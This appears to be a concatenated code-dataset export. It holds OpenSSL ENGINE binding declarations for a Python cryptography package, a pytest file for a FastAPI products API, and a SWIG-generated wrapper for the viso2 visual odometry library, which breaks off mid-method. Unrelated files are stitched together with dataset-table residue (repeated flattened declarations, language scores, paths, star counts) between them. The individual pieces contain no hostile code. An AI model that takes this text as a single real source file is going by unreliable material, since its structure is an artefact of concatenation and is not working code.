ENGINE *ENGINE_new(void);
int ENGINE_free(ENGINE *);
int ENGINE_up_ref(ENGINE *);
int ENGINE_set_id(ENGINE *, const char *);
int ENGINE_set_name(ENGINE *, const char *);
int ENGINE_set_RSA(ENGINE *, const RSA_METHOD *);
int ENGINE_set_DSA(ENGINE *, const DSA_METHOD *);
int ENGINE_set_ECDH(ENGINE *, const ECDH_METHOD *);
int ENGINE_set_ECDSA(ENGINE *, const ECDSA_METHOD *);
int ENGINE_set_DH(ENGINE *, const DH_METHOD *);
int ENGINE_set_RAND(ENGINE *, const RAND_METHOD *);
int ENGINE_set_STORE(ENGINE *, const STORE_METHOD *);
int ENGINE_set_destroy_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_init_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_finish_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR);
int ENGINE_set_ctrl_function(ENGINE *, ENGINE_CTRL_FUNC_PTR);
int ENGINE_set_load_privkey_function(ENGINE *, ENGINE_LOAD_KEY_PTR);
int ENGINE_set_load_pubkey_function(ENGINE *, ENGINE_LOAD_KEY_PTR);
int ENGINE_set_ciphers(ENGINE *, ENGINE_CIPHERS_PTR);
int ENGINE_set_digests(ENGINE *, ENGINE_DIGESTS_PTR);
int ENGINE_set_flags(ENGINE *, int);
int ENGINE_set_cmd_defns(ENGINE *, const ENGINE_CMD_DEFN *);
const char *ENGINE_get_id(const ENGINE *);
const char *ENGINE_get_name(const ENGINE *);
const RSA_METHOD *ENGINE_get_RSA(const ENGINE *);
const DSA_METHOD *ENGINE_get_DSA(const ENGINE *);
const ECDH_METHOD *ENGINE_get_ECDH(const ENGINE *);
const ECDSA_METHOD *ENGINE_get_ECDSA(const ENGINE *);
const DH_METHOD *ENGINE_get_DH(const ENGINE *);
const RAND_METHOD *ENGINE_get_RAND(const ENGINE *);
const STORE_METHOD *ENGINE_get_STORE(const ENGINE *);
const EVP_CIPHER *ENGINE_get_cipher(ENGINE *, int);
const EVP_MD *ENGINE_get_digest(ENGINE *, int);
int ENGINE_get_flags(const ENGINE *);
const ENGINE_CMD_DEFN *ENGINE_get_cmd_defns(const ENGINE *);
EVP_PKEY *ENGINE_load_private_key(ENGINE *, const char *, UI_METHOD *, void *);
EVP_PKEY *ENGINE_load_public_key(ENGINE *, const char *, UI_METHOD *, void *);
void ENGINE_add_conf_module(void);
"""
MACROS = """
void ENGINE_load_cryptodev(void);
"""
CUSTOMIZATIONS = """
#if defined(LIBRESSL_VERSION_NUMBER)
static const long Cryptography_HAS_ENGINE_CRYPTODEV = 0;
void (*ENGINE_load_cryptodev)(void) = NULL;
#else
static const long Cryptography_HAS_ENGINE_CRYPTODEV = 1;
#endif
"""
| en | 0.281096 | # This file is dual licensed under the terms of the Apache License, Version # 2.0, and the BSD License. See the LICENSE file in the root of this repository # for complete details. #include <openssl/engine.h> static const long Cryptography_HAS_ENGINE_CRYPTODEV; typedef ... ENGINE; typedef ... RSA_METHOD; typedef ... DSA_METHOD; typedef ... ECDH_METHOD; typedef ... ECDSA_METHOD; typedef ... DH_METHOD; typedef struct { void (*seed)(const void *, int); int (*bytes)(unsigned char *, int); void (*cleanup)(); void (*add)(const void *, int, double); int (*pseudorand)(unsigned char *, int); int (*status)(); } RAND_METHOD; typedef ... STORE_METHOD; typedef int (*ENGINE_GEN_INT_FUNC_PTR)(ENGINE *); typedef ... *ENGINE_CTRL_FUNC_PTR; typedef ... *ENGINE_LOAD_KEY_PTR; typedef ... *ENGINE_CIPHERS_PTR; typedef ... *ENGINE_DIGESTS_PTR; typedef ... ENGINE_CMD_DEFN; typedef ... UI_METHOD; static const unsigned int ENGINE_METHOD_RSA; static const unsigned int ENGINE_METHOD_DSA; static const unsigned int ENGINE_METHOD_RAND; static const unsigned int ENGINE_METHOD_ECDH; static const unsigned int ENGINE_METHOD_ECDSA; static const unsigned int ENGINE_METHOD_CIPHERS; static const unsigned int ENGINE_METHOD_DIGESTS; static const unsigned int ENGINE_METHOD_STORE; static const unsigned int ENGINE_METHOD_ALL; static const unsigned int ENGINE_METHOD_NONE; static const int ENGINE_R_CONFLICTING_ENGINE_ID; ENGINE *ENGINE_get_first(void); ENGINE *ENGINE_get_last(void); ENGINE *ENGINE_get_next(ENGINE *); ENGINE *ENGINE_get_prev(ENGINE *); int ENGINE_add(ENGINE *); int ENGINE_remove(ENGINE *); ENGINE *ENGINE_by_id(const char *); int ENGINE_init(ENGINE *); int ENGINE_finish(ENGINE *); void ENGINE_load_openssl(void); void ENGINE_load_dynamic(void); void ENGINE_load_builtin_engines(void); void ENGINE_cleanup(void); ENGINE *ENGINE_get_default_RSA(void); ENGINE *ENGINE_get_default_DSA(void); ENGINE *ENGINE_get_default_ECDH(void); ENGINE *ENGINE_get_default_ECDSA(void); ENGINE *ENGINE_get_default_DH(void); ENGINE *ENGINE_get_default_RAND(void); ENGINE *ENGINE_get_cipher_engine(int); ENGINE *ENGINE_get_digest_engine(int); int ENGINE_set_default_RSA(ENGINE *); int ENGINE_set_default_DSA(ENGINE *); int ENGINE_set_default_ECDH(ENGINE *); int ENGINE_set_default_ECDSA(ENGINE *); int ENGINE_set_default_DH(ENGINE *); int ENGINE_set_default_RAND(ENGINE *); int ENGINE_set_default_ciphers(ENGINE *); int ENGINE_set_default_digests(ENGINE *); int ENGINE_set_default_string(ENGINE *, const char *); int ENGINE_set_default(ENGINE *, unsigned int); unsigned int ENGINE_get_table_flags(void); void ENGINE_set_table_flags(unsigned int); int ENGINE_register_RSA(ENGINE *); void ENGINE_unregister_RSA(ENGINE *); void ENGINE_register_all_RSA(void); int ENGINE_register_DSA(ENGINE *); void ENGINE_unregister_DSA(ENGINE *); void ENGINE_register_all_DSA(void); int ENGINE_register_ECDH(ENGINE *); void ENGINE_unregister_ECDH(ENGINE *); void ENGINE_register_all_ECDH(void); int ENGINE_register_ECDSA(ENGINE *); void ENGINE_unregister_ECDSA(ENGINE *); void ENGINE_register_all_ECDSA(void); int ENGINE_register_DH(ENGINE *); void ENGINE_unregister_DH(ENGINE *); void ENGINE_register_all_DH(void); int ENGINE_register_RAND(ENGINE *); void ENGINE_unregister_RAND(ENGINE *); void ENGINE_register_all_RAND(void); int ENGINE_register_STORE(ENGINE *); void ENGINE_unregister_STORE(ENGINE *); void ENGINE_register_all_STORE(void); int ENGINE_register_ciphers(ENGINE *); void ENGINE_unregister_ciphers(ENGINE *); void ENGINE_register_all_ciphers(void); int ENGINE_register_digests(ENGINE *); void ENGINE_unregister_digests(ENGINE *); void ENGINE_register_all_digests(void); int ENGINE_register_complete(ENGINE *); int ENGINE_register_all_complete(void); int ENGINE_ctrl(ENGINE *, int, long, void *, void (*)(void)); int ENGINE_cmd_is_executable(ENGINE *, int); int ENGINE_ctrl_cmd(ENGINE *, const char *, long, void *, void (*)(void), int); int ENGINE_ctrl_cmd_string(ENGINE *, const char *, const char *, int); ENGINE *ENGINE_new(void); int ENGINE_free(ENGINE *); int ENGINE_up_ref(ENGINE *); int ENGINE_set_id(ENGINE *, const char *); int ENGINE_set_name(ENGINE *, const char *); int ENGINE_set_RSA(ENGINE *, const RSA_METHOD *); int ENGINE_set_DSA(ENGINE *, const DSA_METHOD *); int ENGINE_set_ECDH(ENGINE *, const ECDH_METHOD *); int ENGINE_set_ECDSA(ENGINE *, const ECDSA_METHOD *); int ENGINE_set_DH(ENGINE *, const DH_METHOD *); int ENGINE_set_RAND(ENGINE *, const RAND_METHOD *); int ENGINE_set_STORE(ENGINE *, const STORE_METHOD *); int ENGINE_set_destroy_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR); int ENGINE_set_init_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR); int ENGINE_set_finish_function(ENGINE *, ENGINE_GEN_INT_FUNC_PTR); int ENGINE_set_ctrl_function(ENGINE *, ENGINE_CTRL_FUNC_PTR); int ENGINE_set_load_privkey_function(ENGINE *, ENGINE_LOAD_KEY_PTR); int ENGINE_set_load_pubkey_function(ENGINE *, ENGINE_LOAD_KEY_PTR); int ENGINE_set_ciphers(ENGINE *, ENGINE_CIPHERS_PTR); int ENGINE_set_digests(ENGINE *, ENGINE_DIGESTS_PTR); int ENGINE_set_flags(ENGINE *, int); int ENGINE_set_cmd_defns(ENGINE *, const ENGINE_CMD_DEFN *); const char *ENGINE_get_id(const ENGINE *); const char *ENGINE_get_name(const ENGINE *); const RSA_METHOD *ENGINE_get_RSA(const ENGINE *); const DSA_METHOD *ENGINE_get_DSA(const ENGINE *); const ECDH_METHOD *ENGINE_get_ECDH(const ENGINE *); const ECDSA_METHOD *ENGINE_get_ECDSA(const ENGINE *); const DH_METHOD *ENGINE_get_DH(const ENGINE *); const RAND_METHOD *ENGINE_get_RAND(const ENGINE *); const STORE_METHOD *ENGINE_get_STORE(const ENGINE *); const EVP_CIPHER *ENGINE_get_cipher(ENGINE *, int); const EVP_MD *ENGINE_get_digest(ENGINE *, int); int ENGINE_get_flags(const ENGINE *); const ENGINE_CMD_DEFN *ENGINE_get_cmd_defns(const ENGINE *); EVP_PKEY *ENGINE_load_private_key(ENGINE *, const char *, UI_METHOD *, void *); EVP_PKEY *ENGINE_load_public_key(ENGINE *, const char *, UI_METHOD *, void *); void ENGINE_add_conf_module(void); void ENGINE_load_cryptodev(void); #if defined(LIBRESSL_VERSION_NUMBER) static const long Cryptography_HAS_ENGINE_CRYPTODEV = 0; void (*ENGINE_load_cryptodev)(void) = NULL; #else static const long Cryptography_HAS_ENGINE_CRYPTODEV = 1; #endif | 1.6716 | 2 |
tests/products/test_products.py | AlexandruScrob/fast_api_proj_2 | 0 | 9179 | <reponame>AlexandruScrob/fast_api_proj_2<gh_stars>0
import pytest
from httpx import AsyncClient
from conf_test_db import app
from tests.shared.info import category_info, product_info
@pytest.mark.asyncio
async def test_new_product():
async with AsyncClient(app=app, base_url="http://test") as ac:
category_obj = await category_info()
payload = {
"name": "<NAME>",
"quantity": 4,
"description": "Quaker: Good Quality Oats",
"price": 10,
"category_id": category_obj.id,
}
response = await ac.post("/products/", json=payload)
assert response.status_code == 201
json_response = response.json()
assert json_response["name"] == "<NAME>"
assert json_response["quantity"] == 4
assert json_response["description"] == "Quaker: Good Quality Oats"
assert json_response["price"] == 10
@pytest.mark.asyncio
async def test_list_products():
async with AsyncClient(app=app, base_url="http://test") as ac:
category_obj = await category_info()
await product_info(category_obj)
response = await ac.get("/products/")
assert response.status_code == 200
assert "name" in response.json()[0]
assert "quantity" in response.json()[0]
assert "description" in response.json()[0]
assert "price" in response.json()[0]
| import pytest
from httpx import AsyncClient
from conf_test_db import app
from tests.shared.info import category_info, product_info
@pytest.mark.asyncio
async def test_new_product():
async with AsyncClient(app=app, base_url="http://test") as ac:
category_obj = await category_info()
payload = {
"name": "<NAME>",
"quantity": 4,
"description": "Quaker: Good Quality Oats",
"price": 10,
"category_id": category_obj.id,
}
response = await ac.post("/products/", json=payload)
assert response.status_code == 201
json_response = response.json()
assert json_response["name"] == "<NAME>"
assert json_response["quantity"] == 4
assert json_response["description"] == "Quaker: Good Quality Oats"
assert json_response["price"] == 10
@pytest.mark.asyncio
async def test_list_products():
async with AsyncClient(app=app, base_url="http://test") as ac:
category_obj = await category_info()
await product_info(category_obj)
response = await ac.get("/products/")
assert response.status_code == 200
assert "name" in response.json()[0]
assert "quantity" in response.json()[0]
assert "description" in response.json()[0]
assert "price" in response.json()[0] | none | 1 | 2.418374 | 2 |
|
3rdparty/pyviso2/src/viso2.py | utiasSTARS/matchable-image-transforms | 11 | 9180 | # This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.12
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info as _swig_python_version_info
if _swig_python_version_info >= (2, 7, 0):
def swig_import_helper():
import importlib
pkg = __name__.rpartition('.')[0]
mname = '.'.join((pkg, '_viso2')).lstrip('.')
try:
return importlib.import_module(mname)
except ImportError:
return importlib.import_module('_viso2')
_viso2 = swig_import_helper()
del swig_import_helper
elif _swig_python_version_info >= (2, 6, 0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_viso2', [dirname(__file__)])
except ImportError:
import _viso2
return _viso2
try:
_mod = imp.load_module('_viso2', fp, pathname, description)
finally:
if fp is not None:
fp.close()
return _mod
_viso2 = swig_import_helper()
del swig_import_helper
else:
import _viso2
del _swig_python_version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
try:
import builtins as __builtin__
except ImportError:
import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if (name == "thisown"):
return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if (not static):
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
if (name == "thisown"):
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except __builtin__.Exception:
class _object:
pass
_newclass = 0
class SwigPyIterator(_object):
"""Proxy of C++ swig::SwigPyIterator class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _viso2.delete_SwigPyIterator
__del__ = lambda self: None
def value(self):
"""value(self) -> PyObject *"""
return _viso2.SwigPyIterator_value(self)
def incr(self, n=1):
"""
incr(self, n=1) -> SwigPyIterator
incr(self) -> SwigPyIterator
"""
return _viso2.SwigPyIterator_incr(self, n)
def decr(self, n=1):
"""
decr(self, n=1) -> SwigPyIterator
decr(self) -> SwigPyIterator
"""
return _viso2.SwigPyIterator_decr(self, n)
def distance(self, x):
"""distance(self, x) -> ptrdiff_t"""
return _viso2.SwigPyIterator_distance(self, x)
def equal(self, x):
"""equal(self, x) -> bool"""
return _viso2.SwigPyIterator_equal(self, x)
def copy(self):
"""copy(self) -> SwigPyIterator"""
return _viso2.SwigPyIterator_copy(self)
def next(self):
"""next(self) -> PyObject *"""
return _viso2.SwigPyIterator_next(self)
def __next__(self):
"""__next__(self) -> PyObject *"""
return _viso2.SwigPyIterator___next__(self)
def previous(self):
"""previous(self) -> PyObject *"""
return _viso2.SwigPyIterator_previous(self)
def advance(self, n):
"""advance(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator_advance(self, n)
def __eq__(self, x):
"""__eq__(self, x) -> bool"""
return _viso2.SwigPyIterator___eq__(self, x)
def __ne__(self, x):
"""__ne__(self, x) -> bool"""
return _viso2.SwigPyIterator___ne__(self, x)
def __iadd__(self, n):
"""__iadd__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___iadd__(self, n)
def __isub__(self, n):
"""__isub__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___isub__(self, n)
def __add__(self, n):
"""__add__(self, n) -> SwigPyIterator"""
return _viso2.SwigPyIterator___add__(self, n)
def __sub__(self, *args):
"""
__sub__(self, n) -> SwigPyIterator
__sub__(self, x) -> ptrdiff_t
"""
return _viso2.SwigPyIterator___sub__(self, *args)
def __iter__(self):
return self
SwigPyIterator_swigregister = _viso2.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
class VisualOdometry(_object):
"""Proxy of C++ VisualOdometry class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometry, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometry, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _viso2.delete_VisualOdometry
__del__ = lambda self: None
def process(self, p_matched_):
"""process(self, p_matched_) -> bool"""
return _viso2.VisualOdometry_process(self, p_matched_)
def getMotion(self):
"""getMotion(self) -> Matrix"""
return _viso2.VisualOdometry_getMotion(self)
def getMatches(self):
"""getMatches(self) -> MatchVector"""
return _viso2.VisualOdometry_getMatches(self)
def getNumberOfMatches(self):
"""getNumberOfMatches(self) -> int32_t"""
return _viso2.VisualOdometry_getNumberOfMatches(self)
def getNumberOfInliers(self):
"""getNumberOfInliers(self) -> int32_t"""
return _viso2.VisualOdometry_getNumberOfInliers(self)
def getInlierIndices(self):
"""getInlierIndices(self) -> std::vector< int32_t,std::allocator< int32_t > >"""
return _viso2.VisualOdometry_getInlierIndices(self)
def getGain(self, inliers_):
"""getGain(self, inliers_) -> float"""
return _viso2.VisualOdometry_getGain(self, inliers_)
VisualOdometry_swigregister = _viso2.VisualOdometry_swigregister
VisualOdometry_swigregister(VisualOdometry)
class calibration(_object):
"""Proxy of C++ VisualOdometry::calibration class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, calibration, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, calibration, name)
__repr__ = _swig_repr
__swig_setmethods__["f"] = _viso2.calibration_f_set
__swig_getmethods__["f"] = _viso2.calibration_f_get
if _newclass:
f = _swig_property(_viso2.calibration_f_get, _viso2.calibration_f_set)
__swig_setmethods__["cu"] = _viso2.calibration_cu_set
__swig_getmethods__["cu"] = _viso2.calibration_cu_get
if _newclass:
cu = _swig_property(_viso2.calibration_cu_get, _viso2.calibration_cu_set)
__swig_setmethods__["cv"] = _viso2.calibration_cv_set
__swig_getmethods__["cv"] = _viso2.calibration_cv_get
if _newclass:
cv = _swig_property(_viso2.calibration_cv_get, _viso2.calibration_cv_set)
def __init__(self):
"""__init__(self) -> calibration"""
this = _viso2.new_calibration()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_calibration
__del__ = lambda self: None
calibration_swigregister = _viso2.calibration_swigregister
calibration_swigregister(calibration)
class bucketing(_object):
"""Proxy of C++ VisualOdometry::bucketing class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, bucketing, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, bucketing, name)
__repr__ = _swig_repr
__swig_setmethods__["max_features"] = _viso2.bucketing_max_features_set
__swig_getmethods__["max_features"] = _viso2.bucketing_max_features_get
if _newclass:
max_features = _swig_property(_viso2.bucketing_max_features_get, _viso2.bucketing_max_features_set)
__swig_setmethods__["bucket_width"] = _viso2.bucketing_bucket_width_set
__swig_getmethods__["bucket_width"] = _viso2.bucketing_bucket_width_get
if _newclass:
bucket_width = _swig_property(_viso2.bucketing_bucket_width_get, _viso2.bucketing_bucket_width_set)
__swig_setmethods__["bucket_height"] = _viso2.bucketing_bucket_height_set
__swig_getmethods__["bucket_height"] = _viso2.bucketing_bucket_height_get
if _newclass:
bucket_height = _swig_property(_viso2.bucketing_bucket_height_get, _viso2.bucketing_bucket_height_set)
def __init__(self):
"""__init__(self) -> bucketing"""
this = _viso2.new_bucketing()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_bucketing
__del__ = lambda self: None
bucketing_swigregister = _viso2.bucketing_swigregister
bucketing_swigregister(bucketing)
class VO_parameters(_object):
"""Proxy of C++ VisualOdometry::parameters class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, VO_parameters, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, VO_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["match"] = _viso2.VO_parameters_match_set
__swig_getmethods__["match"] = _viso2.VO_parameters_match_get
if _newclass:
match = _swig_property(_viso2.VO_parameters_match_get, _viso2.VO_parameters_match_set)
__swig_setmethods__["bucket"] = _viso2.VO_parameters_bucket_set
__swig_getmethods__["bucket"] = _viso2.VO_parameters_bucket_get
if _newclass:
bucket = _swig_property(_viso2.VO_parameters_bucket_get, _viso2.VO_parameters_bucket_set)
__swig_setmethods__["calib"] = _viso2.VO_parameters_calib_set
__swig_getmethods__["calib"] = _viso2.VO_parameters_calib_get
if _newclass:
calib = _swig_property(_viso2.VO_parameters_calib_get, _viso2.VO_parameters_calib_set)
def __init__(self):
"""__init__(self) -> VO_parameters"""
this = _viso2.new_VO_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VO_parameters
__del__ = lambda self: None
VO_parameters_swigregister = _viso2.VO_parameters_swigregister
VO_parameters_swigregister(VO_parameters)
class VisualOdometryMono(VisualOdometry):
"""Proxy of C++ VisualOdometryMono class."""
__swig_setmethods__ = {}
for _s in [VisualOdometry]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometryMono, name, value)
__swig_getmethods__ = {}
for _s in [VisualOdometry]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometryMono, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> VisualOdometryMono"""
this = _viso2.new_VisualOdometryMono(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VisualOdometryMono
__del__ = lambda self: None
def process(self, *args):
"""
process(self, I, dims, replace=False) -> bool
process(self, I, dims) -> bool
process(self, I1, I2, dims, replace=False) -> bool
process(self, I1, I2, dims) -> bool
"""
return _viso2.VisualOdometryMono_process(self, *args)
def getInlierMatches(self):
"""getInlierMatches(self) -> MatchVector"""
return _viso2.VisualOdometryMono_getInlierMatches(self)
def process_frame(self, *args):
"""
process_frame(self, image1, replace=False) -> bool
process_frame(self, image1) -> bool
process_frame(self, image1, image2, replace=False) -> bool
process_frame(self, image1, image2) -> bool
"""
return _viso2.VisualOdometryMono_process_frame(self, *args)
VisualOdometryMono_swigregister = _viso2.VisualOdometryMono_swigregister
VisualOdometryMono_swigregister(VisualOdometryMono)
class Mono_parameters(VO_parameters):
"""Proxy of C++ VisualOdometryMono::parameters class."""
__swig_setmethods__ = {}
for _s in [VO_parameters]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Mono_parameters, name, value)
__swig_getmethods__ = {}
for _s in [VO_parameters]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Mono_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["height"] = _viso2.Mono_parameters_height_set
__swig_getmethods__["height"] = _viso2.Mono_parameters_height_get
if _newclass:
height = _swig_property(_viso2.Mono_parameters_height_get, _viso2.Mono_parameters_height_set)
__swig_setmethods__["pitch"] = _viso2.Mono_parameters_pitch_set
__swig_getmethods__["pitch"] = _viso2.Mono_parameters_pitch_get
if _newclass:
pitch = _swig_property(_viso2.Mono_parameters_pitch_get, _viso2.Mono_parameters_pitch_set)
__swig_setmethods__["ransac_iters"] = _viso2.Mono_parameters_ransac_iters_set
__swig_getmethods__["ransac_iters"] = _viso2.Mono_parameters_ransac_iters_get
if _newclass:
ransac_iters = _swig_property(_viso2.Mono_parameters_ransac_iters_get, _viso2.Mono_parameters_ransac_iters_set)
__swig_setmethods__["inlier_threshold"] = _viso2.Mono_parameters_inlier_threshold_set
__swig_getmethods__["inlier_threshold"] = _viso2.Mono_parameters_inlier_threshold_get
if _newclass:
inlier_threshold = _swig_property(_viso2.Mono_parameters_inlier_threshold_get, _viso2.Mono_parameters_inlier_threshold_set)
__swig_setmethods__["motion_threshold"] = _viso2.Mono_parameters_motion_threshold_set
__swig_getmethods__["motion_threshold"] = _viso2.Mono_parameters_motion_threshold_get
if _newclass:
motion_threshold = _swig_property(_viso2.Mono_parameters_motion_threshold_get, _viso2.Mono_parameters_motion_threshold_set)
def __init__(self):
"""__init__(self) -> Mono_parameters"""
this = _viso2.new_Mono_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Mono_parameters
__del__ = lambda self: None
Mono_parameters_swigregister = _viso2.Mono_parameters_swigregister
Mono_parameters_swigregister(Mono_parameters)
class VisualOdometryStereo(VisualOdometry):
"""Proxy of C++ VisualOdometryStereo class."""
__swig_setmethods__ = {}
for _s in [VisualOdometry]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, VisualOdometryStereo, name, value)
__swig_getmethods__ = {}
for _s in [VisualOdometry]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, VisualOdometryStereo, name)
__repr__ = _swig_repr
def __init__(self, param):
"""__init__(self, param) -> VisualOdometryStereo"""
this = _viso2.new_VisualOdometryStereo(param)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_VisualOdometryStereo
__del__ = lambda self: None
def process(self, *args):
"""
process(self, I1, I2, dims, replace=False) -> bool
process(self, I1, I2, dims) -> bool
process(self, p_matched_) -> bool
"""
return _viso2.VisualOdometryStereo_process(self, *args)
def process_frame(self, image1, image2, replace=False):
"""
process_frame(self, image1, image2, replace=False) -> bool
process_frame(self, image1, image2) -> bool
"""
return _viso2.VisualOdometryStereo_process_frame(self, image1, image2, replace)
VisualOdometryStereo_swigregister = _viso2.VisualOdometryStereo_swigregister
VisualOdometryStereo_swigregister(VisualOdometryStereo)
class Stereo_parameters(VO_parameters):
"""Proxy of C++ VisualOdometryStereo::parameters class."""
__swig_setmethods__ = {}
for _s in [VO_parameters]:
__swig_setmethods__.update(getattr(_s, '__swig_setmethods__', {}))
__setattr__ = lambda self, name, value: _swig_setattr(self, Stereo_parameters, name, value)
__swig_getmethods__ = {}
for _s in [VO_parameters]:
__swig_getmethods__.update(getattr(_s, '__swig_getmethods__', {}))
__getattr__ = lambda self, name: _swig_getattr(self, Stereo_parameters, name)
__repr__ = _swig_repr
__swig_setmethods__["base"] = _viso2.Stereo_parameters_base_set
__swig_getmethods__["base"] = _viso2.Stereo_parameters_base_get
if _newclass:
base = _swig_property(_viso2.Stereo_parameters_base_get, _viso2.Stereo_parameters_base_set)
__swig_setmethods__["ransac_iters"] = _viso2.Stereo_parameters_ransac_iters_set
__swig_getmethods__["ransac_iters"] = _viso2.Stereo_parameters_ransac_iters_get
if _newclass:
ransac_iters = _swig_property(_viso2.Stereo_parameters_ransac_iters_get, _viso2.Stereo_parameters_ransac_iters_set)
__swig_setmethods__["inlier_threshold"] = _viso2.Stereo_parameters_inlier_threshold_set
__swig_getmethods__["inlier_threshold"] = _viso2.Stereo_parameters_inlier_threshold_get
if _newclass:
inlier_threshold = _swig_property(_viso2.Stereo_parameters_inlier_threshold_get, _viso2.Stereo_parameters_inlier_threshold_set)
__swig_setmethods__["reweighting"] = _viso2.Stereo_parameters_reweighting_set
__swig_getmethods__["reweighting"] = _viso2.Stereo_parameters_reweighting_get
if _newclass:
reweighting = _swig_property(_viso2.Stereo_parameters_reweighting_get, _viso2.Stereo_parameters_reweighting_set)
def __init__(self):
"""__init__(self) -> Stereo_parameters"""
this = _viso2.new_Stereo_parameters()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Stereo_parameters
__del__ = lambda self: None
Stereo_parameters_swigregister = _viso2.Stereo_parameters_swigregister
Stereo_parameters_swigregister(Stereo_parameters)
class Matrix(_object):
"""Proxy of C++ Matrix class."""
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Matrix, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Matrix, name)
__repr__ = _swig_repr
def __init__(self, *args):
"""
__init__(self) -> Matrix
__init__(self, m, n) -> Matrix
__init__(self, m, n, val_) -> Matrix
__init__(self, M) -> Matrix
"""
this = _viso2.new_Matrix(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
__swig_destroy__ = _viso2.delete_Matrix
__del__ = lambda self: None
def assign(self, M):
"""assign(self, M) -> Matrix"""
return _viso2.Matrix_assign(self, M)
def getData(self, val_, i1=0, j1=0, i2=-1, j2=-1):
"""
getData(self, val_, i1=0, j1=0, i2=-1, j2=-1)
getData(self, val_, i1=0, j1=0, i2=-1)
getData(self, val_, i1=0, j1=0)
getData(self, val_, i1=0)
getData(self, val_)
"""
return _viso2.Matrix_getData(self, val_, i1, j1, i2, j2)
def getMat(self, i1, j1, i2=-1, j2=-1):
"""
getMat(self, i1, j1, i2=-1, j2=-1) -> Matrix
getMat(self, i1, j1, i2=-1) -> Matrix
getMat(self, i1, j1) -> Matrix
"""
return _viso2.Matrix_getMat(self, i1, j1, i2, j2)
def setMat(self, M, i, j):
"""setMat(self, M, i, j)"""
return _viso2.Matrix_setMat(self, M, i, j)
def setVal(self, s, i1=0, j1=0, i2=-1, j2=-1):
"""
setVal(self, s, i1=0, j1=0, i2=-1, j2=-1)
setVal(self, s, i1=0, j1=0, i2=-1)
setVal(self, s, i1=0, j1=0)
setVal(self, s, i1=0)
setVal(self, s)
"""
